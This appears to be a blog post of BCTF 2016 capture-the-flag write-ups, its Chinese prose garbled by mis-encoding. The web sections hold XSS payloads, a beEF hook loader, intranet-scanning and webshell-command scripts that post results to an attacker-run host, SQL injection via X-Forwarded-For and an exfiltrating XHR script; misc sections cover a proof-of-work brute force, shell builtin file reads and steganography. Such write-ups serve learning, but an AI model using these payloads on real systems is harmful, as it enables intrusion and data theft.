LoRexxar's Blog

bctf2016

2016/03/22

鍓嶄袱澶╂墦浜哹ctf2016锛岀粨鏋滃仛鍒版渶鍚庨兘娌℃兂鏄庣櫧web棰樼洰鐨勬濊矾锛岃屼笖20澶氶亾棰樼洰锛屽嵈鍙湁2閬搘eb棰極rz锛岀湡鏄笉缁檞eb鐙楁椿璺,web鐙楄繖骞村ご瑕佽浆鍨媘isc浜嗏

web

qaq 锛坕frame鏍囩璺ㄥ煙+CORS鍐呯綉锛

hint1: What else can XSS do? Just steal cookies? Secret in intranet锛宧ack harder guys!
hint2: CORS headers

鐜板湪鑳芥悳鍒扮殑鍙湁涓绡囦粠ctftime涓婃壘鍒扮殑澶栧浗浜虹殑writeuphttps://github.com/raccoons-team/ctf/tree/master/2016-03-19-bctf/web-350-QAQ

鎵撳紑棰樼洰棣栧厛鏄竴涓ぇ澶х殑鐣欒█鏉匡紝閭e熀鏈簲璇ユ病浠涔堝埆鐨勪簡锛屽厛灏濊瘯bypass xss filter鍚с

绋嶅井娴嬭瘯浜嗕竴涓嬪父瑙佺殑鏍囩閮借杩囨护浜嗭紝杩樺墿涓<iframe><link>

link鏍囩鍙兘鐢ㄦ潵csrf锛岄偅搴旇娌¢敊灏辨槸ifreame鏍囩浜嗐

鎴戣嚜宸变娇鐢ㄧ殑鏄父瑙勭殑璋冪敤鏂瑰紡

1
<iframe src="http://youdomain/xxx.php">

鍦╬hp鏂囦欢涓啓鍏<script>灏卞彲浠ユ墽琛屾墍闇瑕佺殑js浜嗐

鑰岃佸鐢ㄧ殑鏄痠frame鐨刼nload鐨勫睘鎬э紝锛堝鏋滄垜娌¤閿欑殑璇濅細琚玞hrome filter鎷︽埅锛夆

1
2
3
4
5
6
7
<iframe onload='
var sc = document.createElement("scr" + "ipt");
sc.type = "text/javascr" + "ipt";
sc.src = "http://1.2.3.4/js/hook.js";
document.body.appendChild(sc);
'
/>

閫氳繃涓婇潰鐨勪唬鐮侊紝鎴愬姛浣跨敤domxss鍒涢犱簡

1
<script type="text/javascript" src="http://1.2.3.4/js/hook.js"></script>

杩欐牱涓鏉ュ氨鍙互鎵ц浠绘剰鐨刯s锛屽綋鎴戜滑鎻愪氦鍚庯紝鍚庢潵绠$悊鍛樺氨浼氬鏍搞

涓婇潰鐨勮佸浣跨敤鐨勬槸beEF妗嗘灦鐨刪ook.js鏉ュ拰鏈嶅姟鍣ㄦ矡閫氾紝鍙戠幇澶ф5绉掑乏鍙充細鏂紑銆

棰樼洰绗竴涓彁绀哄憡璇夋垜浠瀵嗗湪鍐呯綉涓紝閭d箞鎴戜滑闇瑕佹壂涓涓媓ost锛屼粠beEF涓紝鎴戜滑鍙互鐪嬪埌

1
2
3
127.0.0.1 localhost Linux
172.17.0.1 Linux
192.168.1.3 Linux

鐒跺悗妫鏌ヤ笅hosts涓殑闄勮繎ip锛岃繖閲岃佸鏄敤鐨刯query鐨勮姹

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
jQuery.get( "http://192.168.1.1", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: "192.168.1.1"} );
});
jQuery.get( "http://192.168.1.2", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: "192.168.1.2"} );
});
jQuery.get( "http://192.168.1.3", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: "192.168.1.3"} );
});
jQuery.get( "http://192.168.1.4", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: "192.168.1.4"} );
});
jQuery.get( "http://192.168.1.5", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: "192.168.1.5"} );
});
jQuery.get( "http://172.17.0.1", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: "172.17.0.1"} );
});
jQuery.get( "http://172.17.0.2", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: "172.17.0.2"} );
});
jQuery.get( "http://172.17.0.3", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: "172.17.0.3"} );
});
jQuery.get( "http://172.17.0.4", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: "172.17.0.4"} );
});
jQuery.get( "http://172.17.0.5", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: "172.17.0.5"} );
});

http://1.2.3.4/app_dev.php杩欐牱鍐

1
2
3
4
5
<?php
$file = fopen("file.txt", "a");
fwrite($file, "\n\n\n". $_POST['x']);
fclose($myfile);

娴嬭瘯鍙戠幇172.17.0.2瀛樺湪

閭d箞鍏堣姹備竴涓172.17.0.2璇曡瘯鐪嬶紝鍙戠幇杩斿洖

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<html>
<body>
=.=
webdog
webshell
=.=
<!--
header("Access-Control-Allow-Origin: *");
$ztz= 'system';
ob_start($ztz);
echo $_GET[c];
ob_end_flush();
or
$ztz = new ReflectionFunction("system");
echo $ztz->invokeArgs(array("$_GET[c]"));
-->
</body>
</html>

鍙戠幇瀛樺湪涓涓猵hp shell閫氳繃$_GET[c];

閭d箞ls涓涓嬪彂鐜

1
2
3
fl4g
index.php
index.php

鐪嬪埌flag浜嗭紝cat涓涓

1
2
3
jQuery.get( "http://172.17.0.2/?c=cat fl4g", function( data ) {
jQuery.post( "http://1.2.3.4/app_dev.php", { x: data} );
});

get!

homework

鎵句簡涓娈垫椂闂存病鏈夋壘鍒皐riteup锛屽彧鎵惧埌涓涓湅鍙嬪啓鐨勶紝浣嗘槸鏄繕娌℃湁getflag鐗堬紝浣嗘槸杩樻槸鑳藉緱鍒板緢澶氫笢瑗裤

http://www.isecer.com/ctf/bctf-2016-log-for-homework.html

1銆乭int1: source code can be leaked.
2銆乭int2: version control
3銆乭int3: hack the server

棣栧厛灏辨槸涓涓ぇ鍧戯紝hints璇存湁婧愮爜娉勯湶杩樻湁鐗堟湰鎺у埗锛岀涓鍙嶅簲灏辨槸.git锛屼絾鏄苟娌℃湁锛屽悗鏉ユ兂鍒颁互鍓嶅湪涓嬭佸鍐欑殑githack宸ュ叿鐨勬椂鍊欒繕鐪嬪埌鍒殑鍑犱釜鐗堟湰鐨勭埇婧愮爜宸ュ叿锛屾墦寮鍙戠幇鐪熺殑鏈夌埇.hg鐨勩

https://github.com/kost/dvcs-ripper

鍙戠幇/index.php鍜/admin/read.php鍙兘瀛樺湪婕忔礊

index.php涓湁杩囨护鍑芥暟

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
function stripStr($str) {
$str=str_ireplace("'","",$str);
$str=str_ireplace('"',"",$str);
$str=str_ireplace('&',"",$str);
$str=str_ireplace('#',"",$str);
$str=str_ireplace(';',"",$str);
$str=str_ireplace(',',"",$str);
$str=str_ireplace(':',"",$str);
$str=str_ireplace('`',"",$str);
$str=str_ireplace('(',"",$str);
$str=str_ireplace(')',"",$str);
$str=str_ireplace('[',"",$str);
$str=str_ireplace(']',"",$str);
$str=str_ireplace('\\',"",$str);
$str=str_ireplace('\r',"",$str);
$str=str_ireplace('\n',"",$str);
$str=str_ireplace('\0',"",$str);
do $str=str_ireplace("script","",$str,$count); while($count>0);
do $str=str_ireplace("iframe","",$str,$count); while($count>0);
do $str=str_ireplace("data","",$str,$count); while($count>0);
do $str=str_ireplace("\\x","",$str,$count); while($count>0);
do $str=str_ireplace("\\u","",$str,$count); while($count>0);
return $str;

read.php涓璯et_ip鏈夋礊

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ip=get_client_ip();
function get_client_ip(){
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")){
$ip = getenv("HTTP_CLIENT_IP");
}else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")){
$ip = getenv("HTTP_X_FORWARDED_FOR");
}else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")){
$ip = getenv("REMOTE_ADDR");
}else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")){
$ip = $_SERVER['REMOTE_ADDR'];
}else{
$ip = "unknown";
}
return($ip);
}
$sql = "UPDATE `test`.`message` SET `is_read` = '1', `operation_log_ip` ='".
$ip."', `operation_log_ua` ='".ua."' WHERE `message`.`index` = '".$_GET['index']."';";
query($sql);

娉ㄥ叆鍚庡彂鐜帮紝骞朵笉鑳界牬瑙e瘑鐮侊紝閭d箞杩樺緱xss

1
<scrdataipt src//xxx.com/xss.js.php></scrdataipt>

js寰堥殢鎰忎簡锛屽彲浠ヨ繖鏍峰啓

1
2
3
4
5
6
7
xhr=new XMLHttpRequest();
xhr.open("POST","http://104.199.137.82/admin/read.php?index=<?=$i?>",false);
xhr.setRequestHeader("X-Forwarded-For","<?=$p?>");
xhr.send();
r=xhr.responseText;
xhr.open("POST","http://xxx.com/get.php",true);
xhr.send("v="+escape(escape(r)))

鏈変釜闂鏄鏋滅鐞嗗憳鐪嬪埌浣犱簡涔嬪悗灏变細璁句负isread锛岄偅涔堝氨涓嶈兘娉ㄥ叆浜嗐傘傞偅涔堣剼鏈氨鏄繀瑕佺殑浜嗐

misc

hsab 锛坰ha纰版挒锛

棰樼洰鏈変袱涓潙锛岄鍏堟槸瑕佺鎾炲嚭涓涓墠20涓0锛屽拰鎵缁欏肩浉鍚岀殑瀛楃涓诧紝闃熷弸鍐欎簡涓剼鏈

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
import hashlib
import re
import itertools
import string
rand_string = string.ascii_letters + "0123456789"
e2 = itertools.permutations(rand_string, 10)
def fuck_1(s):
while True:
try:
e3 = e2.next()
except StopIteration:
exit(-1)
ns = s + "".join(e3)
sha = hashlib.sha256(ns).hexdigest()
sha_bin = bin(int(sha, 16))[2:]
sha_bin = '0' * (256%len(sha_bin)) + sha_bin
if sha_bin[:20] == "00000000000000000000":
return ns
def main():
global flag
#context.log_level = "debug"
#conn = remote("104.199.132.199", 2223)
conn = remote("104.199.132.199", 2222)
#st = "rnwgqhnz"
#print fuck_1(st)
str1 = conn.recvuntil("zeros.")
print str1
st = re.findall(r"'(.+?)'", str1)[0]
pt1 = fuck_1(st)
conn.send(pt1+"\n")
conn.sendline("pwd")
conn.interactive()
if __name__ == '__main__':
main()

杩涘幓浜嗗悗鍙戠幇鍛戒护鍙墿涓嬩簡鍐呭缓鍛戒护锛屽畬鍏ㄦ嚨姣旓紝閭d箞娴嬭瘯鍚э紝鍏堟槸鍙戠幇echo鍙互鍒楃洰褰

1
echo /home/ctf/*

杩欐牱灏变細鍒楀嚭ctf涓嬬殑鎵鏈夋枃浠讹紝鐒跺悗鍙戠幇浜唂lag.ray锛屼絾鏄祴璇曚簡寰堜箙閮芥壘涓嶅埌璇诲彇杩欎釜鏂囦欢鐨勬柟娉曘
鍚庢潵鐪嬩簡writeup鍙戠幇鏈夊緢澶氱鏂瑰紡璇绘枃浠躲

绗竴绉嶅ソ鍍忔槸瀹樻柟鍋氭硶

1
dlcall -n fd -r pointer open /home/ctf/flag.ray 0 && dlcall -n mapped -r pointer mmap 0 10 1 1 \$fd 0 && dlcall printf %s \$mapped

娌℃湁寰堢湅鎳

鍚庢潵鍙戠幇鍙互鐢ㄥ埆鐨勫懡浠

1
2
3
bash -v /home/ctf/flag.ray
history -r /home/ctf/flag.ray history

鎶涓嶅浜猴紝鐢樻嫓涓嬮

catvideo (ffmege filter)

棰樼洰鏄釜姣旇緝澶х殑video锛屽湪windows涓嬪ソ鍍忔槸鎵撲笉寮鐨勶紝鍦╨inux涓嬪彲浠ョ湅鍒板緢澶氬緢澶氱殑闆姳锛屽綋鏃舵病浠涔堟兂娉曪紝鍚庢潵鐪嬪埌鍑犵瘒writeup锛岃櫧鐒跺鐜版垚鍔熶簡锛屼絾鏄病鏈夊緢寮勬槑鐧芥槸鎬庝箞鍥炰簨銆

http://countersite.org/articles/steganography/68-bctf-2016-stego-catvideo.html#sel=18:7,18:7

http://fadec0d3.blogspot.jp/

http://err0r-451.ru/2016-bctf-forensic-catvideo-150-pts/

铏界劧鍋氬嚭鏉ョ殑浜鸿В閲婁笉鍚岋紝浣嗘槸鍋氭硶鐩稿悓锛岄兘鏄埄鐢╢fmege鎶婅棰戞媶鍒嗘垚鍥剧墖锛岀劧鍚庡紓鎴栵紝灏辫兘鐪嬪埌涓浜涘浘鐗囦簡銆

棣栧厛鏄敤ffmpeg鎶婅棰戞媶鍒

1
ffmpeg.exe -i catvideo-497570b7e2811eb52dd75bac9839f19d7bca5ef4.mp4 -r 30.0 fr_%4d.bmp

鍙傛暟姣旇緝澶氾紝鏈変竴浜鏂囨。

鎴嚭浜1000澶氬浘鐗囷紝閭e啓涓剼鏈瘮杈冨樊寮傚惂銆

1
2
3
4
5
6
7
8
from PIL import Image
from PIL import ImageChops
import glob
im0 = Image.open("fr_0001.bmp")
for frame in glob.glob("./frames/*"):
ImageChops.subtrat(Image.open(frame), im0).save(frame.replace("frames", "frames_new"))

璺戝嚭鏉ヤ簡寰堝鍥剧墖锛岃櫧鐒朵笉娓呮锛屼絾鏄彲浠ョ湅鍒癴lag浜嗐傘傘

鍏充簬python鐨刬magechops涓嶆槸寰堟噦锛屽彧鎵惧埌涓閮ㄥ垎鏂囨。

midifan(midi lsb闅愬啓)

澶嶇幇棰樼洰鑺变簡寰堜箙锛岀綉涓婃壘涓嶅埌瀹屾暣鐨剋riteup锛屽彧鎵惧埌涓涓剼鏈紝鑺变簡寰堜箙灏濊瘯澶嶇幇锛屼粖澶╃粓浜庢悶鍑篺lag浜嗭紝浣嗘槸瀵逛簬midi鏍煎紡鐨勪笢瑗胯繕鏄笉鐔熸倝銆

涔嬪墠鍋氶鐩殑鏃跺欐槸浣跨敤pymidi妯″潡鐨勶紝浣嗘槸鐢ㄤ簡寰堜箙閮芥悶涓嶅嚭flag锛屽悗鏉ョ敤鍒汉鐨勮剼鏈窇鍑烘潵涔嬪悗鎵嶆槑鐧芥槸鎬庝箞鍥炰簨銆

棣栧厛瑕佸鐞唌idi鏍煎紡鐨勯煶涔愶紝瑕侀鍏堟妸鏁版嵁杞负csv锛屽緱鍒板畬鏁寸殑鍐呭銆
杩欓噷鎴戠敤鐨勬槸杩欎釜http://www.fourmilab.ch/webtools/midicsv/,鍛戒护琛屾墽琛

1
midicsv.exe midifan.mid xxx.csv

灏辫兘寰楀埌瀹屾暣鐨刢sv浜嗭紝鐒跺悗灏辫鍐欒剼鏈簡銆

1
2
3
4
5
6
7
8
9
10
11
12
13
#from scryptos import *
import binascii
d = open("xxx.csv").read().split("\n")
bits = ""
for x in d:
r = x.split(", ")
if len(r) > 4:
if int(r[3]) == 0:
if r[2] == "Note_on_c":
bits += str(int(r[1]) % 2)
print binascii.unhexlify(hex(int(bits[::-1], 2))[2:-1])[::-1]

涓婇潰鐨勮剼鏈殑鎰忔濇槸璇诲嚭channel涓0鐨勯閬撴暟鎹紝鐒跺悗绛涢夊嚭鍏朵腑note_on_c鐨勶紝鏍规嵁date鏁版嵁涓紝濡傛灉鏄鏁拌繑鍥1锛屽伓鏁拌繑鍥2锛岀劧鍚庨嗗簭杞16杩涘埗瑙ex鍐嶉嗗簭灏眊et flag浜

1
BCTF{ju6t_0ne_b1t_of_d1FF}

CATALOG
  1. 1. web
    1. 1.1. qaq 锛坕frame鏍囩璺ㄥ煙+CORS鍐呯綉锛
    2. 1.2. homework
  2. 2. misc
    1. 2.1. hsab 锛坰ha纰版挒锛
    2. 2.2. catvideo (ffmege filter)
    3. 2.3. midifan(midi lsb闅愬啓)